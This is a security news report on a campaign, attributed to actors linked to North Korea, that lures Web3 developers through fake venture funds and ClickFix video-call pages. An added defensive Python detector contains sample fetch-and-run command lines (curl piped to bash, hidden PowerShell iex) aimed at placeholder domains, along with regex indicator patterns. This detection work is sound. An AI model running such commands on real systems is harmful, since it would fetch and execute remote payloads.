Analysts from Moonlock Lab have uncovered a large-scale attack on Web3 developers and crypto specialists. The hackers disguise themselves as venture investors and find their victims on LinkedIn.
The perpetrators praise the specialists' projects and propose collaboration. They then send links to fake video conferences that infect computers with malware.
The Illusion of a Legitimate Business
The attackers have created three fictitious crypto funds: SolidBit Capital, MegaBit, and Lumax Capital. The websites of these organizations appear credible, featuring corporate histories, investment portfolios, and lists of executives. The images of the staff were generated by neural networks.
Source: Moonlock Lab.
The scammers contact specialists from fake accounts, posing as senior managers of these funds. The conversation begins with compliments about the victim's professional achievements.
Infection via ClickFix
The hackers quickly move the conversation to messaging apps and invite the victim to a video call. The victim receives a Calendly link. This address redirects the user to an exact copy of the Zoom, Google Meet, or similar service's website.
A Cloudflare verification window pops up on the screen. The system asks the user to check a box to confirm they are not a robot. This is a hacker technique known as ClickFix.
Clicking the button discreetly copies malicious code to the clipboard. The site displays an animated instruction with a timer, prompting the user to open the system terminal, paste the copied text, and press Enter.
The code automatically detects the operating system:
- On Windows, a hidden process is launched directly in memory. The malware writes no files to the hard drive, which helps it evade security tools;
- On macOS, the script checks whether Python is installed, silently downloads the libraries it needs, and installs itself on the system.
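The ClickFix chain described above leaves one reliable trace on the endpoint: a command line that the user pasted into an interactive terminal and that fetches remote content and hands it to an interpreter (or, on Windows, launches a hidden in-memory PowerShell). The following Python is an added example, not code from Moonlock Lab or the report; it scores constructed process-creation events against indicator patterns that are my own assumptions, using placeholder `.invalid` domains, and flags those that combine an interactive-terminal parent with fetch-and-execute behaviour.

```python
import re

# Indicator patterns (assumed, defender-authored): each is one piece of evidence.
INDICATORS = {
    "remote_fetch": r"\b(curl|wget|iwr|invoke-webrequest|downloadstring|downloadfile|urllib\.request|urlopen)\b",
    "execute_fetched": r"\|\s*(ba)?sh\b|\|\s*python3?\b|\biex\b|invoke-expression|\bexec\(",
    "hidden_window": r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(nc|ncodedcommand)?\s",
    "base64_decode": r"base64\s+(-d|--decode)\b|frombase64string|b64decode",
    "python_probe": r"\b(which|command -v)\s+python|\bpip3?\s+install\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}

# Parents that mean "a human pasted this into a terminal" (the ClickFix step).
INTERACTIVE_PARENTS = {"terminal", "iterm2", "cmd.exe", "powershell.exe", "windowsterminal.exe"}

# Constructed sample events, shaped like EDR process-creation records.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "Terminal", "user": "dev",
     "cmd": "git status"},
    {"host": "mac-01", "parent": "Terminal", "user": "dev",
     "cmd": "curl -fsSL https://meet-example.invalid/verify.sh | bash"},
    {"host": "mac-02", "parent": "Terminal", "user": "dev",
     "cmd": "python3 -c \"import urllib.request; exec(urllib.request.urlopen('https://zoom-example.invalid/p').read())\""},
    {"host": "win-01", "parent": "cmd.exe", "user": "dev",
     "cmd": "powershell -w hidden -nop -c \"iex (iwr https://verify-example.invalid/x)\""},
    {"host": "win-01", "parent": "explorer.exe", "user": "dev",
     "cmd": "powershell -c Get-Date"},
    {"host": "mac-01", "parent": "Terminal", "user": "dev",
     "cmd": "echo aGVsbG8= | base64 -d"},
]


def score_command(cmd):
    """Return (score, matched indicator names) for a single command line."""
    hits = [name for name, rx in COMPILED.items() if rx.search(cmd)]
    return len(hits), hits


def score_event(event):
    """Command-line score plus one point if the parent is an interactive terminal."""
    score, hits = score_command(event["cmd"])
    if event.get("parent", "").lower() in INTERACTIVE_PARENTS:
        score += 1
        hits = hits + ["interactive_terminal_parent"]
    return score, hits


def flag_events(events, threshold=3):
    """Return the events whose combined score reaches the threshold.

    A lone base64 decode or a lone curl in a terminal is normal developer
    activity; fetch + execute (+ terminal parent) is the ClickFix shape.
    """
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({**ev, "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for f in flag_events(SAMPLE_EVENTS):
        print(f"{f['host']} score={f['score']} {f['indicators']}\n    {f['cmd']}")
```

In a SOC this logic belongs in a detection rule over process-creation telemetry (Sysmon event 1, EDR exec events, or macOS unified-log/ES process events); the threshold keeps routine `curl | sh` installers and `base64 -d` usage out of the alert queue while still catching the terminal-pasted fetch-and-run pattern.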
In some cases, the hackers sent victims an application that completely mimics the interface of the real Zoom client on Mac. The program displays a fake login window, collects the entered passwords, and sends them to the scammers' Telegram bot.
Links to North Korean Hackers
The addresses of the fake websites are registered in the name of Anatoly Bigdash from Boston, USA. Experts doubt the existence of this person.
Source: Moonlock Lab.
Researchers noted similarities in tactics with the methods used by the UNC1069 group. This team has been hacking crypto projects since 2018. Analysts from Mandiant have previously linked it to North Korea. The criminals use identical structures for malicious links and similar deception scenarios built around fake video calls.
To protect against such attacks, specialists recommend checking the registration dates of the domains used by new contacts. Legitimate services never ask users to enter commands in a terminal to verify their identity or start a call. The deception can often be recognized at the moment an external link is clicked.
Recall that in June 2025, Mehdi Farouk, an investment partner at the venture firm Hypersphere, fell victim to a phishing attack through a fake Zoom call.
